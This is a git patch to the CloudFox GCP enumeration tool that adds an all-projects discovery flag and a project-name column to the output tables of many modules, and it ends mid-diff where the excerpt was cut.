0df2aa92406fd6b42cf4e98442e4e2e1a26e6062 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Tue, 30 Dec 2025 13:32:16 -0500 Subject: [PATCH 04/48] updated to include all-projects and added project name to output --- cli/gcp.go | 78 ++- gcp/commands/apikeys.go | 18 +- gcp/commands/appengine.go | 20 +- gcp/commands/artifact-registry.go | 18 +- gcp/commands/assetinventory.go | 13 +- gcp/commands/backupinventory.go | 24 +- gcp/commands/beyondcorp.go | 13 +- gcp/commands/bigquery.go | 18 +- gcp/commands/bigtable.go | 10 +- gcp/commands/bucketenum.go | 14 +- gcp/commands/buckets.go | 20 +- gcp/commands/certmanager.go | 15 +- gcp/commands/cloudarmor.go | 13 +- gcp/commands/cloudbuild.go | 13 +- gcp/commands/cloudrun.go | 11 +- gcp/commands/cloudsql.go | 17 +- gcp/commands/compliancedashboard.go | 12 +- gcp/commands/composer.go | 13 +- gcp/commands/containersecurity.go | 24 +- gcp/commands/costsecurity.go | 24 +- gcp/commands/crossproject.go | 17 +- gcp/commands/customroles.go | 13 +- gcp/commands/dataexfiltration.go | 16 +- gcp/commands/dataflow.go | 13 +- gcp/commands/dataproc.go | 13 +- gcp/commands/dns.go | 9 +- gcp/commands/domainwidedelegation.go | 9 +- gcp/commands/endpoints.go | 14 +- gcp/commands/filestore.go | 10 +- gcp/commands/firewall.go | 13 +- gcp/commands/functions.go | 17 +- gcp/commands/gke.go | 19 +- gcp/commands/hmackeys.go | 11 +- gcp/commands/iam.go | 22 +- gcp/commands/iap.go | 13 +- gcp/commands/identityprotection.go | 16 +- gcp/commands/instances.go | 30 +- gcp/commands/kms.go | 11 +- gcp/commands/lateralmovement.go | 20 +- gcp/commands/loadbalancers.go | 20 +- gcp/commands/logging.go | 11 +- gcp/commands/logginggaps.go | 9 +- gcp/commands/memorystore.go | 9 +- gcp/commands/monitoringalerts.go | 20 +- gcp/commands/networkendpoints.go | 16 +- gcp/commands/networkexposure.go | 16 +- gcp/commands/networktopology.go | 16 +- gcp/commands/notebooks.go | 16 +- gcp/commands/organizations.go | 10 +- gcp/commands/orgpolicies.go | 11 +- gcp/commands/permissions.go | 32 +- gcp/commands/privesc.go | 11 +- gcp/commands/publicresources.go | 9 +- gcp/commands/pubsub.go | 11 +- gcp/commands/resourcegraph.go | 16 +- gcp/commands/scheduler.go | 9 +- gcp/commands/secrets.go | 16 +- gcp/commands/securitycenter.go | 24 +- gcp/commands/serviceaccounts.go | 16 +- gcp/commands/serviceagents.go | 9 +- gcp/commands/sourcerepos.go | 9 +- gcp/commands/spanner.go | 10 +- gcp/commands/sshoslogin.go | 13 +- gcp/commands/vpcnetworks.go | 19 +- gcp/commands/whoami-enhanced.go | 722 -------------------------- gcp/commands/whoami.go | 733 ++++++++++++++++++++++++++- gcp/commands/workloadidentity.go | 16 +- globals/gcp.go | 1 - internal/gcp/base.go | 34 +- 69 files changed, 1642 insertions(+), 896 deletions(-) delete mode 100644 gcp/commands/whoami-enhanced.go diff --git a/cli/gcp.go b/cli/gcp.go index c48c13b7..184fe8e4 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -6,6 +6,7 @@ import ( "github.com/BishopFox/cloudfox/gcp/commands" oauthservice "github.com/BishopFox/cloudfox/gcp/services/oauthService" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) @@ -16,6 +17,10 @@ var ( GCPProjectID string GCPProjectIDsFilePath string GCPProjectIDs []string + GCPAllProjects bool + + // Project name mapping (ProjectID -> DisplayName) + GCPProjectNames map[string]string // Output formatting options GCPOutputFormat string @@ -36,18 +41,45 @@ var ( Long: `See "Available Commands" for GCP Modules below`, Short: "See \"Available Commands\" for GCP Modules below", PersistentPreRun: func(cmd *cobra.Command, args []string) { - if GCPProjectID != "" { + // Initialize project names map + GCPProjectNames = make(map[string]string) + + // Handle project discovery based on flags + if GCPAllProjects { + // Discover all accessible projects + GCPLogger.InfoM("Discovering all accessible projects...", "gcp") + orgsSvc := orgsservice.New() + projects, err := orgsSvc.SearchProjects("") + if err != nil { + GCPLogger.FatalM(fmt.Sprintf("Failed to discover projects: %v. Try using -p or -l flags instead.", err), "gcp") + } + for _, proj := range projects { + if proj.State == "ACTIVE" { + GCPProjectIDs = append(GCPProjectIDs, proj.ProjectID) + GCPProjectNames[proj.ProjectID] = proj.DisplayName + } + } + if len(GCPProjectIDs) == 0 { + GCPLogger.FatalM("No accessible projects found. Check your permissions.", "gcp") + } + GCPLogger.InfoM(fmt.Sprintf("Discovered %d project(s)", len(GCPProjectIDs)), "gcp") + } else if GCPProjectID != "" { GCPProjectIDs = append(GCPProjectIDs, GCPProjectID) + // Resolve project name for single project + resolveProjectNames(GCPProjectIDs) } else if GCPProjectIDsFilePath != "" { GCPProjectIDs = internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) + // Resolve project names for all projects in list + resolveProjectNames(GCPProjectIDs) } else { - GCPLogger.InfoM("project or project-list flags not given, commands requiring a project ID will fail", "gcp") + GCPLogger.InfoM("project, project-list, or all-projects flag not given, commands requiring a project ID will fail", "gcp") } - // Create a context with this value to share it with subcommands at runtime + + // Create a context with project IDs and names ctx := context.WithValue(context.Background(), "projectIDs", GCPProjectIDs) + ctx = context.WithValue(ctx, "projectNames", GCPProjectNames) - // Set the context for this command which all subcommands can access via [SUBCMD].Parent().Context() - // cmd.SetContext(ctx) + // Authenticate and get account info os := oauthservice.NewOAuthService() principal, err := os.WhoAmI() if err != nil { @@ -59,6 +91,40 @@ var ( } ) +// resolveProjectNames fetches display names for given project IDs +func resolveProjectNames(projectIDs []string) { + if len(projectIDs) == 0 { + return + } + + orgsSvc := orgsservice.New() + // Fetch all accessible projects and build lookup map + projects, err := orgsSvc.SearchProjects("") + if err != nil { + // Non-fatal: we can continue without display names + GCPLogger.InfoM("Could not resolve project names, using project IDs only", "gcp") + for _, id := range projectIDs { + GCPProjectNames[id] = id // fallback to using ID as name + } + return + } + + // Build lookup from fetched projects + projectLookup := make(map[string]string) + for _, proj := range projects { + projectLookup[proj.ProjectID] = proj.DisplayName + } + + // Map our project IDs to names + for _, id := range projectIDs { + if name, ok := projectLookup[id]; ok { + GCPProjectNames[id] = name + } else { + GCPProjectNames[id] = id // fallback to using ID as name + } + } +} + // New RunAllGCPCommands function to execute all child commands var GCPAllChecksCommand = &cobra.Command{ Use: "all-checks", @@ -86,7 +152,7 @@ func init() { // GCPCommands.PersistentFlags().StringVarP(&GCPOrganization, "organization", "o", "", "Organization name or number, repetable") GCPCommands.PersistentFlags().StringVarP(&GCPProjectID, "project", "p", "", "GCP project ID") GCPCommands.PersistentFlags().StringVarP(&GCPProjectIDsFilePath, "project-list", "l", "", "Path to a file containing a list of project IDs separated by newlines") - // GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "a", false, "Use all project IDs available to activated gloud account or given gcloud account") + GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "a", false, "Automatically discover and use all accessible projects") // GCPCommands.PersistentFlags().BoolVarP(&GCPConfirm, "yes", "y", false, "Non-interactive mode (like apt/yum)") // GCPCommands.PersistentFlags().StringVarP(&GCPOutputFormat, "output", "", "brief", "[\"brief\" | \"wide\" ]") GCPCommands.PersistentFlags().IntVarP(&Verbosity, "verbosity", "v", 2, "1 = Print control messages only\n2 = Print control messages, module output\n3 = Print control messages, module output, and loot file output\n") diff --git a/gcp/commands/apikeys.go b/gcp/commands/apikeys.go index 9389e9b1..14fcaef7 100644 --- a/gcp/commands/apikeys.go +++ b/gcp/commands/apikeys.go @@ -280,6 +280,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) keysHeader := []string{ "Key ID", "Display Name", + "Project Name", "Project", "Restriction Type", "API Targets", @@ -319,6 +320,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) keysBody = append(keysBody, []string{ keyID, key.DisplayName, + m.GetProjectName(key.ProjectID), key.ProjectID, restrictionType, apiTargets, @@ -332,6 +334,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) unrestrictedHeader := []string{ "Key ID", "Display Name", + "Project Name", "Project", "Created", "Has Key String", @@ -353,6 +356,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) unrestrictedBody = append(unrestrictedBody, []string{ keyID, key.DisplayName, + m.GetProjectName(key.ProjectID), key.ProjectID, created, hasKeyString, @@ -363,6 +367,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) // Restrictions detail table restrictionsHeader := []string{ "Key ID", + "Project Name", "Project", "Type", "Allowed Values", @@ -377,6 +382,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) if len(key.AllowedAPIs) > 0 { restrictionsBody = append(restrictionsBody, []string{ keyID, + m.GetProjectName(key.ProjectID), key.ProjectID, "API", strings.Join(key.AllowedAPIs, ", "), @@ -387,6 +393,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) if len(key.AllowedReferers) > 0 { restrictionsBody = append(restrictionsBody, []string{ keyID, + m.GetProjectName(key.ProjectID), key.ProjectID, "Referer", strings.Join(key.AllowedReferers, ", "), @@ -397,6 +404,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) if len(key.AllowedIPs) > 0 { restrictionsBody = append(restrictionsBody, []string{ keyID, + m.GetProjectName(key.ProjectID), key.ProjectID, "IP", strings.Join(key.AllowedIPs, ", "), @@ -407,6 +415,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) if len(key.AllowedAndroidApps) > 0 { restrictionsBody = append(restrictionsBody, []string{ keyID, + m.GetProjectName(key.ProjectID), key.ProjectID, "Android", strings.Join(key.AllowedAndroidApps, ", "), @@ -417,6 +426,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) if len(key.AllowedIOSApps) > 0 { restrictionsBody = append(restrictionsBody, []string{ keyID, + m.GetProjectName(key.ProjectID), key.ProjectID, "iOS", strings.Join(key.AllowedIOSApps, ", "), @@ -428,6 +438,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) // High-risk keys table highRiskHeader := []string{ "Key ID", + "Project Name", "Project", "Risk Level", "Risk Reasons", @@ -439,6 +450,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) keyID := extractKeyID(key.Name) highRiskBody = append(highRiskBody, []string{ keyID, + m.GetProjectName(key.ProjectID), key.ProjectID, key.RiskLevel, strings.Join(key.RiskReasons, "; "), @@ -498,6 +510,10 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) } // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } err := internal.HandleOutputSmart( "gcp", m.Format, @@ -506,7 +522,7 @@ func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) m.WrapTable, "project", // scopeType m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + scopeNames, // scopeNames m.Account, output, ) diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go index 74cc6ffd..94a8ee12 100644 --- a/gcp/commands/appengine.go +++ b/gcp/commands/appengine.go @@ -596,7 +596,8 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge // App Engine Apps table appsHeader := []string{ "App ID", - "Project", + "Project Name", + "Project ID", "Location", "Status", "Hostname", @@ -607,6 +608,7 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge for _, app := range m.Apps { appsBody = append(appsBody, []string{ app.ID, + m.GetProjectName(app.ProjectID), app.ProjectID, app.LocationID, app.ServingStatus, @@ -618,7 +620,8 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge // App Engine Services table servicesHeader := []string{ "Service", - "Project", + "Project Name", + "Project ID", "Versions", } @@ -633,6 +636,7 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge servicesBody = append(servicesBody, []string{ svc.ID, + m.GetProjectName(svc.ProjectID), svc.ProjectID, fmt.Sprintf("%d", versionsCount), }) @@ -702,7 +706,8 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge "Priority", "Action", "Source Range", - "Project", + "Project Name", + "Project ID", "Description", } @@ -712,6 +717,7 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge fmt.Sprintf("%d", rule.Priority), rule.Action, rule.SourceRange, + m.GetProjectName(rule.ProjectID), rule.ProjectID, truncateString(rule.Description, 30), }) @@ -773,6 +779,12 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge Loot: lootFiles, } + // Build scope names using project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -781,7 +793,7 @@ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logge m.Verbosity, m.WrapTable, "project", - m.ProjectIDs, + scopeNames, m.ProjectIDs, m.Account, output, diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index 9575cf23..369b9642 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -405,6 +405,7 @@ func artifactBoolToCheck(b bool) string { func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger internal.Logger) { // Main repository table with security-relevant columns repoHeader := []string{ + "Project Name", "Project ID", "Name", "Format", @@ -437,6 +438,7 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna mode = strings.TrimSuffix(mode, "_REPOSITORY") repoBody = append(repoBody, []string{ + m.GetProjectName(repo.ProjectID), repo.ProjectID, repoName, repo.Format, @@ -451,6 +453,7 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna // Artifact table with enhanced fields artifactHeader := []string{ + "Project Name", "Project ID", "Name", "Repository", @@ -480,6 +483,7 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna } artifactBody = append(artifactBody, []string{ + m.GetProjectName(artifact.ProjectID), artifact.ProjectID, artifact.Name, artifact.Repository, @@ -494,6 +498,7 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna // IAM bindings table - one row per member iamHeader := []string{ "Repository", + "Project Name", "Project ID", "Location", "Role", @@ -519,6 +524,7 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna memberType := ArtifactRegistryService.GetMemberType(member) iamBody = append(iamBody, []string{ repoName, + m.GetProjectName(repo.ProjectID), repo.ProjectID, repo.Location, binding.Role, @@ -532,6 +538,7 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna // Public repositories table publicHeader := []string{ "Repository", + "Project Name", "Project ID", "Location", "Format", @@ -550,6 +557,7 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna publicBody = append(publicBody, []string{ repoName, + m.GetProjectName(repo.ProjectID), repo.ProjectID, repo.Location, repo.Format, @@ -609,15 +617,19 @@ func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger interna } // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } err := internal.HandleOutputSmart( "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames m.Account, output, ) diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go index bae744d0..26ced4e2 100644 --- a/gcp/commands/assetinventory.go +++ b/gcp/commands/assetinventory.go @@ -239,7 +239,7 @@ func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal. Body: body, }) } else { - header := []string{"Name", "Asset Type", "Location", "Project"} + header := []string{"Name", "Asset Type", "Location", "Project Name", "Project"} if checkIAM { header = append(header, "IAM Bindings", "Public Access", "Risk") } @@ -250,6 +250,7 @@ func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal. asset.Name, assetservice.ExtractAssetTypeShort(asset.AssetType), asset.Location, + m.GetProjectName(asset.ProjectID), asset.ProjectID, } if checkIAM { @@ -277,6 +278,7 @@ func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal. asset.AssetType, asset.RiskLevel, strings.Join(asset.RiskReasons, "; "), + m.GetProjectName(asset.ProjectID), asset.ProjectID, }) } @@ -285,7 +287,7 @@ func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal. if len(publicBody) > 0 { tables = append(tables, internal.TableFile{ Name: "public-assets", - Header: []string{"Name", "Asset Type", "Risk Level", "Reasons", "Project"}, + Header: []string{"Name", "Asset Type", "Risk Level", "Reasons", "Project Name", "Project"}, Body: publicBody, }) } @@ -301,8 +303,13 @@ func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal. output := AssetInventoryOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) } diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go index e46073c3..66ba8c0a 100644 --- a/gcp/commands/backupinventory.go +++ b/gcp/commands/backupinventory.go @@ -708,7 +708,8 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal // Protected Resources table protectedHeader := []string{ "Resource", - "Project", + "Project Name", + "Project ID", "Type", "Backup Type", "Last Backup", @@ -726,6 +727,7 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal protectedBody = append(protectedBody, []string{ r.Name, + m.GetProjectName(r.ProjectID), r.ProjectID, r.ResourceType, r.BackupType, @@ -745,7 +747,8 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal // Unprotected Resources table unprotectedHeader := []string{ "Resource", - "Project", + "Project Name", + "Project ID", "Type", "Location", "Size (GB)", @@ -757,6 +760,7 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal for _, r := range m.UnprotectedResources { unprotectedBody = append(unprotectedBody, []string{ r.Name, + m.GetProjectName(r.ProjectID), r.ProjectID, r.ResourceType, r.Location, @@ -775,7 +779,8 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal // Backup Policies table policiesHeader := []string{ "Policy", - "Project", + "Project Name", + "Project ID", "Type", "Schedule", "Retention", @@ -786,6 +791,7 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal for _, p := range m.BackupPolicies { policiesBody = append(policiesBody, []string{ p.Name, + m.GetProjectName(p.ProjectID), p.ProjectID, p.ResourceType, p.Schedule, @@ -797,7 +803,8 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal // Snapshots table snapshotsHeader := []string{ "Snapshot", - "Project", + "Project Name", + "Project ID", "Source Disk", "Size (GB)", "Created", @@ -808,6 +815,7 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal for _, s := range m.Snapshots { snapshotsBody = append(snapshotsBody, []string{ s.Name, + m.GetProjectName(s.ProjectID), s.ProjectID, m.extractDiskName(s.SourceDisk), fmt.Sprintf("%d", s.DiskSizeGB), @@ -864,6 +872,12 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal Loot: lootFiles, } + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -873,7 +887,7 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go index 0ae626c1..d76e69d0 100644 --- a/gcp/commands/beyondcorp.go +++ b/gcp/commands/beyondcorp.go @@ -125,7 +125,7 @@ func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logg // App Connectors table if len(m.AppConnectors) > 0 { - header := []string{"Name", "Location", "State", "Service Account", "Risk", "Project"} + header := []string{"Name", "Location", "State", "Service Account", "Risk", "Project Name", "Project"} var body [][]string for _, connector := range m.AppConnectors { body = append(body, []string{ @@ -134,6 +134,7 @@ func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logg connector.State, connector.PrincipalInfo, connector.RiskLevel, + m.GetProjectName(connector.ProjectID), connector.ProjectID, }) } @@ -146,7 +147,7 @@ func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logg // App Connections table if len(m.AppConnections) > 0 { - header := []string{"Name", "Location", "State", "Endpoint", "Gateway", "Risk", "Project"} + header := []string{"Name", "Location", "State", "Endpoint", "Gateway", "Risk", "Project Name", "Project"} var body [][]string for _, conn := range m.AppConnections { body = append(body, []string{ @@ -156,6 +157,7 @@ func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logg conn.ApplicationEndpoint, conn.Gateway, conn.RiskLevel, + m.GetProjectName(conn.ProjectID), conn.ProjectID, }) } @@ -175,8 +177,13 @@ func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logg output := BeyondCorpOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BEYONDCORP_MODULE_NAME) } diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index 27b315f6..978e5ce1 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -355,6 +355,7 @@ func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger) { // Dataset table with security columns datasetHeader := []string{ + "Project Name", "Project ID", "Dataset ID", "Name", @@ -373,6 +374,7 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger } datasetBody = append(datasetBody, []string{ + m.GetProjectName(dataset.ProjectID), dataset.ProjectID, dataset.DatasetID, dataset.Name, @@ -386,6 +388,7 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger // Table table with security columns tableHeader := []string{ + "Project Name", "Project ID", "Dataset ID", "Table ID", @@ -405,6 +408,7 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger } tableBody = append(tableBody, []string{ + m.GetProjectName(table.ProjectID), table.ProjectID, table.DatasetID, table.TableID, @@ -420,6 +424,7 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger // Access bindings table (one row per access entry) accessHeader := []string{ "Dataset", + "Project Name", "Project ID", "Location", "Role", @@ -433,6 +438,7 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger memberType := BigQueryService.GetMemberType(entry.EntityType, entry.Entity) accessBody = append(accessBody, []string{ dataset.DatasetID, + m.GetProjectName(dataset.ProjectID), dataset.ProjectID, dataset.Location, entry.Role, @@ -445,6 +451,7 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger // Public datasets table publicHeader := []string{ "Dataset", + "Project Name", "Project ID", "Location", "Public Access", @@ -456,6 +463,7 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger if dataset.IsPublic { publicBody = append(publicBody, []string{ dataset.DatasetID, + m.GetProjectName(dataset.ProjectID), dataset.ProjectID, dataset.Location, dataset.PublicAccess, @@ -511,15 +519,19 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger } // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } err := internal.HandleOutputSmart( "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames m.Account, output, ) diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go index 7a0baead..c92bc79e 100644 --- a/gcp/commands/bigtable.go +++ b/gcp/commands/bigtable.go @@ -103,7 +103,7 @@ func (m *BigtableModule) addToLoot(instance bigtableservice.BigtableInstanceInfo } func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{"Name", "Display Name", "Type", "Tables", "Clusters", "State", "Project"} + header := []string{"Name", "Display Name", "Type", "Tables", "Clusters", "State", "Project Name", "Project"} var body [][]string for _, instance := range m.Instances { @@ -114,6 +114,7 @@ func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger strings.Join(instance.Tables, ", "), fmt.Sprintf("%d", len(instance.Clusters)), instance.State, + m.GetProjectName(instance.ProjectID), instance.ProjectID, }) } @@ -130,6 +131,11 @@ func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) } diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go index 8f65bd01..c32ab437 100644 --- a/gcp/commands/bucketenum.go +++ b/gcp/commands/bucketenum.go @@ -250,6 +250,7 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg "Object Name", "Size", "Description", + "Project Name", "Project", } @@ -268,6 +269,7 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg objName, formatFileSize(file.Size), file.Description, + m.GetProjectName(file.ProjectID), file.ProjectID, }) } @@ -303,6 +305,7 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg bucketHeader := []string{ "Bucket", "Sensitive Files", + "Project Name", "Project", } @@ -312,10 +315,12 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg bucketProjects[file.BucketName] = file.ProjectID } for bucket, count := range bucketCounts { + projectID := bucketProjects[bucket] bucketBody = append(bucketBody, []string{ bucket, fmt.Sprintf("%d", count), - bucketProjects[bucket], + m.GetProjectName(projectID), + projectID, }) } @@ -354,6 +359,11 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg output := BucketEnumOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -361,7 +371,7 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg m.Verbosity, m.WrapTable, "project", - m.ProjectIDs, + scopeNames, m.ProjectIDs, m.Account, output, diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index 28a2cb1e..63503b2e 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -450,6 +450,7 @@ func getMemberType(member string) string { func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) { // Main table with security-relevant columns header := []string{ + "Project Name", "Project ID", "Name", "Location", @@ -499,6 +500,7 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) } body = append(body, []string{ + m.GetProjectName(bucket.ProjectID), bucket.ProjectID, bucket.Name, bucket.Location, @@ -514,6 +516,7 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) // Security config table securityHeader := []string{ "Bucket", + "Project Name", "Project ID", "PublicAccessPrevention", "UniformAccess", @@ -539,6 +542,7 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) securityBody = append(securityBody, []string{ bucket.Name, + m.GetProjectName(bucket.ProjectID), bucket.ProjectID, bucket.PublicAccessPrevention, boolToCheckMark(bucket.UniformBucketLevelAccess), @@ -551,6 +555,7 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) // Detailed IAM table - one row per member for granular view iamHeader := []string{ "Bucket", + "Project Name", "Project ID", "Role", "Member Type", @@ -564,6 +569,7 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) memberType := getMemberType(member) iamBody = append(iamBody, []string{ bucket.Name, + m.GetProjectName(bucket.ProjectID), bucket.ProjectID, binding.Role, memberType, @@ -576,6 +582,7 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) // Public buckets table (if any) publicHeader := []string{ "Bucket", + "Project Name", "Project ID", "Public Access", "Public Access Prevention", @@ -587,6 +594,7 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) if bucket.IsPublic { 